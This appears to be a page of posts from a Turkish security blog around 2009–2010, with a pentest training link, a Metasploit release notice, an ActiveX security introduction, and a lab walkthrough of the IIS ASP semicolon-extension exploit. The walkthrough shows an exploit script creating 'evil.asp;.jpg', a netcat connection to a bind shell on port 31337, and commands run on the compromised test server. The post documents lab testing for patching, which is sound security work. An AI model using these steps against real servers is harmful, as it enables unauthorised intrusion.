Sec "IP" nix » Network Security

Online Penetration Testing Eğitimleri

Uğur Engin — Thu, 27 May 2010 14:17:57 +0000

Elearnsecurity firmasinin hazırladığı Security Training ile ilgili Darknet de henuz yeni girilmis bir entry dikkatimi çekti.
ilgilenen arkadaşlar inceleyebilirler.

http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training

Detaylar:

http://www.elearnsecurity.com/course/penetration_testing/

Share on Facebook

IIS ASP Multiple Extensions Remote Exploit

Uğur Engin — Sun, 10 Jan 2010 14:32:38 +0000

Windows IIS sunucular üzerinde ciddi bir güvenlik açığı yayınlandı.İlgili exploit araciligiyla olusturulabilecek bir malicious dosyası(06;.jpg) , IIS sunucu(5,6) üzerinde çalıştırıldığında sunucunun Outgoing den, atacker’in source’sine doğru 31337. portun açılmasınına sebep oluyor.Daha sonra doğru payload’ı kullanabilecek kişi, sunucu üzerinden shell alabiliyor.

Patch cozumu gelistirmek icin ilgili exploiti virtual bir Windows Server da test ettim.

Shellcode / Payload Connection

0 – shell_bind_tcp

Penetration materyaller:

OS : Server 2003 Enterprise x86 SP2
Victim Vlan: 192.168.127.130
Web Server : IIS6
Destination: Ubuntu 9.10 (karmic)

Testleri yapalım:

root@ubuntu:~/labs# python iis.py def.jpg 0
Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x
By Emanuele Gentili and Emanuele Acri (http://backtrack.it)
[+] File evil.asp;.jpg created and ready to use.
Enjoy… ;)

root@ubuntu:~/labs# ls -l
total 1260
-rw-r–r– 1 root root 12902 2009-10-31 01:08 def.jpg
-rw-r–r– 1 root root 326377 2010-01-10 14:08 evil.asp;.jpg
-rwxrwxrwx 1 root root 945931 2010-01-10 14:03 iis.py

evil.asp;.jpg vulnerable durumda olan dosyayı IIS sunucuda çalıştıralım.

root@ubuntu:~/labs# nc -vv 192.168.127.130 31337
192.168.127.130: inverse host lookup failed: Unknown hosit
(UNKNOWN) [192.168.127.130] 31337 (?) open
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>ipconfig

Windows IP ConfigurationEthernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.127.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.127.2

c:\windows\system32\inetsrv>net user
User accounts for \\LOCALROOT

Network tarafinda olayları gozlemlemek icin, enfekte durumun da olup hacklenen serveri kontrol edelim.(Handshake checking)

Nmap ile kontrol edelim.

root@ubuntu:~/labs# nmap -sT -d 192.168.127.130 -p 31337

31337/tcp open Elite syn-ack
MAC Address: 00:0C:29:71:6D:2B (VMware

Referanslar:

http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf

http://secunia.com/advisories/37831/

Share on Facebook

Metasploit 3.3.2

Uğur Engin — Sun, 13 Dec 2009 21:43:39 +0000

Metasploit 3.3.2 ile bizlerle.

Share on Facebook

ActiveX Nedir ? ActiveX Güvenliği

Uğur Engin — Fri, 10 Jul 2009 21:07:07 +0000

Yazan : Serhat Dündar

ActiveX, Microsoft’un Windows platformları için geliştirdiği bir nesne bileşeni modelidir (COM). Yazılım tabanlı olan ActiveX teknolojisi Internet Explorer eklentisi ve web sayfalarına iliştirilmiş ActiveX tabanlı uygulama olarak çalışır.

ActiveX teknolojisi geliştirilmeden önce Microsoft Windows’ta OLE (Object Linking and Embedding) ve COM (Component Object Model) olmak üzere iki standart mevcuttu. 1996 yılında sunulan ActiveX ile bu iki standart birleştirildi. (Wikipedia)

Bu tanım işin programlama kısmıyla alakalı. Biz ise bu yazımızda active-x’in ne olduğundan çok ActiveX ile neler yapılabileceğine bakacağız.

ActiveX denetimi bir kod parçasıdır, programdır. O halde ActiveX denetimleri ile bilgisayarınıza yapılabilecekleri biraz da olsa tahmin etmişsinizdir

Yazının devamını okuyunuz.

Activex nesnesi’nin islevini ve güvenlik boyutunu aciklayıcı bir sekilde anlatan arkadasa tesekkur ederiz.

Share on Facebook